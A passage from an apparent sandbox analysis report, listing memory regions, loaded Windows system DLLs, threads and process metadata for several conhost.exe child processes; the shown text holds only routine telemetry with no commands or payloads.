0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 747 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 748 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 749 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 24 os_tid = 0xc08 Thread: id = 40 os_tid = 0xc7c Thread: id = 54 os_tid = 0xcd0 Thread: id = 249 os_tid = 0x10e8 Process: id = "24" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe435000" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb0c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 536 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 537 start_va = 0x7c0bce0000 end_va = 0x7c0bcfffff entry_point = 0x0 region_type = private name = "private_0x0000007c0bce0000" filename = "" Region: id = 538 start_va = 0x7c0bd00000 end_va = 0x7c0bd13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0bd00000" filename = "" Region: id = 539 start_va = 0x7c0bd20000 end_va = 0x7c0bd5ffff entry_point = 0x0 region_type = private name = "private_0x0000007c0bd20000" filename = "" Region: id = 540 start_va = 0x7df5ff900000 end_va = 0x7ff5ff8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff900000" filename = "" Region: id = 541 start_va = 0x7ff6c4750000 end_va = 0x7ff6c4772fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4750000" filename = "" Region: id = 542 start_va = 0x7ff6c4773000 end_va = 0x7ff6c4773fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4773000" filename = "" Region: id = 543 start_va = 0x7ff6c477e000 end_va = 0x7ff6c477ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c477e000" filename = "" Region: id = 544 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 545 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 546 start_va = 0x7c0bf00000 end_va = 0x7c0bffffff entry_point = 0x0 region_type = private name = "private_0x0000007c0bf00000" filename = "" Region: id = 547 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 548 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1763 start_va = 0x7c0bce0000 end_va = 0x7c0bceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0bce0000" filename = "" Region: id = 1764 start_va = 0x7c0bcf0000 end_va = 0x7c0bcf6fff entry_point = 0x0 region_type = private name = "private_0x0000007c0bcf0000" filename = "" Region: id = 1765 start_va = 0x7c0bd60000 end_va = 0x7c0be1dfff entry_point = 0x7c0bd60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1766 start_va = 0x7c0be20000 end_va = 0x7c0be5ffff entry_point = 0x0 region_type = private name = "private_0x0000007c0be20000" filename = "" Region: id = 1767 start_va = 0x7c0be60000 end_va = 0x7c0be60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0be60000" filename = "" Region: id = 1768 start_va = 0x7c0be70000 end_va = 0x7c0be76fff entry_point = 0x0 region_type = private name = "private_0x0000007c0be70000" filename = "" Region: id = 1769 start_va = 0x7c0be80000 end_va = 0x7c0be80fff entry_point = 0x0 region_type = private name = "private_0x0000007c0be80000" filename = "" Region: id = 1770 start_va = 0x7c0be90000 end_va = 0x7c0be90fff entry_point = 0x0 region_type = private name = "private_0x0000007c0be90000" filename = "" Region: id = 1771 start_va = 0x7c0c150000 end_va = 0x7c0c15ffff entry_point = 0x0 region_type = private name = "private_0x0000007c0c150000" filename = "" Region: id = 1772 start_va = 0x7c0c160000 end_va = 0x7c0c2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0c160000" filename = "" Region: id = 1773 start_va = 0x7c0c2f0000 end_va = 0x7c0c470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0c2f0000" filename = "" Region: id = 1774 start_va = 0x7c0c480000 end_va = 0x7c0d87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007c0c480000" filename = "" Region: id = 1775 start_va = 0x7ff6c4650000 end_va = 0x7ff6c474ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4650000" filename = "" Region: id = 1776 start_va = 0x7ff6c477c000 end_va = 0x7ff6c477dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c477c000" filename = "" Region: id = 1777 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1778 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1779 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1780 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1781 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1782 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1783 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1784 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1785 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1786 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1787 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1788 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 25 os_tid = 0xc10 Thread: id = 41 os_tid = 0xc80 Thread: id = 153 os_tid = 0xfb0 Thread: id = 258 os_tid = 0x110c Process: id = "25" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe476000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb34" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 549 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 550 start_va = 0x37b35c0000 end_va = 0x37b35dffff entry_point = 0x0 region_type = private name = "private_0x00000037b35c0000" filename = "" Region: id = 551 start_va = 0x37b35e0000 end_va = 0x37b35f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b35e0000" filename = "" Region: id = 552 start_va = 0x37b3600000 end_va = 0x37b363ffff entry_point = 0x0 region_type = private name = "private_0x00000037b3600000" filename = "" Region: id = 553 start_va = 0x7df5ffec0000 end_va = 0x7ff5ffebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 554 start_va = 0x7ff6c3e70000 end_va = 0x7ff6c3e92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e70000" filename = "" Region: id = 555 start_va = 0x7ff6c3e9b000 end_va = 0x7ff6c3e9bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9b000" filename = "" Region: id = 556 start_va = 0x7ff6c3e9e000 end_va = 0x7ff6c3e9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9e000" filename = "" Region: id = 557 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 558 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 559 start_va = 0x37b3820000 end_va = 0x37b391ffff entry_point = 0x0 region_type = private name = "private_0x00000037b3820000" filename = "" Region: id = 560 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 561 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1531 start_va = 0x37b35c0000 end_va = 0x37b35cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b35c0000" filename = "" Region: id = 1532 start_va = 0x37b35d0000 end_va = 0x37b35d6fff entry_point = 0x0 region_type = private name = "private_0x00000037b35d0000" filename = "" Region: id = 1533 start_va = 0x37b3640000 end_va = 0x37b36fdfff entry_point = 0x37b3640000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1534 start_va = 0x37b3700000 end_va = 0x37b373ffff entry_point = 0x0 region_type = private name = "private_0x00000037b3700000" filename = "" Region: id = 1535 start_va = 0x37b3740000 end_va = 0x37b3740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b3740000" filename = "" Region: id = 1536 start_va = 0x37b3750000 end_va = 0x37b3756fff entry_point = 0x0 region_type = private name = "private_0x00000037b3750000" filename = "" Region: id = 1537 start_va = 0x37b3760000 end_va = 0x37b3760fff entry_point = 0x0 region_type = private name = "private_0x00000037b3760000" filename = "" Region: id = 1538 start_va = 0x37b3770000 end_va = 0x37b3770fff entry_point = 0x0 region_type = private name = "private_0x00000037b3770000" filename = "" Region: id = 1539 start_va = 0x37b37d0000 end_va = 0x37b37dffff entry_point = 0x0 region_type = private name = "private_0x00000037b37d0000" filename = "" Region: id = 1540 start_va = 0x37b3920000 end_va = 0x37b3aa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b3920000" filename = "" Region: id = 1541 start_va = 0x37b3ab0000 end_va = 0x37b3c30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b3ab0000" filename = "" Region: id = 1542 start_va = 0x37b3c40000 end_va = 0x37b503ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037b3c40000" filename = "" Region: id = 1543 start_va = 0x7ff6c3d70000 end_va = 0x7ff6c3e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d70000" filename = "" Region: id = 1544 start_va = 0x7ff6c3e9c000 end_va = 0x7ff6c3e9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9c000" filename = "" Region: id = 1545 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1546 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1547 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1548 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1549 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1550 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1551 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1552 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1553 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1554 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1555 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1556 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 26 os_tid = 0xc18 Thread: id = 42 os_tid = 0xc84 Thread: id = 107 os_tid = 0xe4c Thread: id = 252 os_tid = 0x10f4 Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4c939000" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xb64" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 562 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 563 start_va = 0x9938f00000 end_va = 0x9938f1ffff entry_point = 0x0 region_type = private name = "private_0x0000009938f00000" filename = "" Region: id = 564 start_va = 0x9938f20000 end_va = 0x9938f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009938f20000" filename = "" Region: id = 565 start_va = 0x9938f40000 end_va = 0x9938f7ffff entry_point = 0x0 region_type = private name = "private_0x0000009938f40000" filename = "" Region: id = 566 start_va = 0x7df5ffce0000 end_va = 0x7ff5ffcdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffce0000" filename = "" Region: id = 567 start_va = 0x7ff6c3fe0000 end_va = 0x7ff6c4002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fe0000" filename = "" Region: id = 568 start_va = 0x7ff6c400d000 end_va = 0x7ff6c400efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c400d000" filename = "" Region: id = 569 start_va = 0x7ff6c400f000 end_va = 0x7ff6c400ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c400f000" filename = "" Region: id = 570 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 571 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 572 start_va = 0x9938fb0000 end_va = 0x99390affff entry_point = 0x0 region_type = private name = "private_0x0000009938fb0000" filename = "" Region: id = 573 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 574 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 932 start_va = 0x9938f00000 end_va = 0x9938f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009938f00000" filename = "" Region: id = 933 start_va = 0x9938f10000 end_va = 0x9938f16fff entry_point = 0x0 region_type = private name = "private_0x0000009938f10000" filename = "" Region: id = 934 start_va = 0x9938f80000 end_va = 0x9938f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009938f80000" filename = "" Region: id = 935 start_va = 0x9938f90000 end_va = 0x9938f96fff entry_point = 0x0 region_type = private name = "private_0x0000009938f90000" filename = "" Region: id = 936 start_va = 0x9938fa0000 end_va = 0x9938fa0fff entry_point = 0x0 region_type = private name = "private_0x0000009938fa0000" filename = "" Region: id = 937 start_va = 0x99390b0000 end_va = 0x993916dfff entry_point = 0x99390b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 938 start_va = 0x9939170000 end_va = 0x99391affff entry_point = 0x0 region_type = private name = "private_0x0000009939170000" filename = "" Region: id = 939 start_va = 0x99391b0000 end_va = 0x9939337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000099391b0000" filename = "" Region: id = 940 start_va = 0x9939340000 end_va = 0x9939340fff entry_point = 0x0 region_type = private name = "private_0x0000009939340000" filename = "" Region: id = 941 start_va = 0x9939390000 end_va = 0x993939ffff entry_point = 0x0 region_type = private name = "private_0x0000009939390000" filename = "" Region: id = 942 start_va = 0x99393a0000 end_va = 0x9939520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000099393a0000" filename = "" Region: id = 943 start_va = 0x9939530000 end_va = 0x993a92ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009939530000" filename = "" Region: id = 944 start_va = 0x7ff6c3ee0000 end_va = 0x7ff6c3fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ee0000" filename = "" Region: id = 945 start_va = 0x7ff6c400b000 end_va = 0x7ff6c400cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c400b000" filename = "" Region: id = 946 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 947 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 948 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 949 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 950 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 951 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 952 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 953 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 954 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 955 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 956 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 957 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1583 start_va = 0x9939350000 end_va = 0x993938ffff entry_point = 0x0 region_type = private name = "private_0x0000009939350000" filename = "" Region: id = 1584 start_va = 0x993aa10000 end_va = 0x993aa1ffff entry_point = 0x0 region_type = private name = "private_0x000000993aa10000" filename = "" Region: id = 1585 start_va = 0x7ff6c4009000 end_va = 0x7ff6c400afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4009000" filename = "" Region: id = 1586 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1587 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1588 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1589 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1590 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1591 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1592 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1593 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1594 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 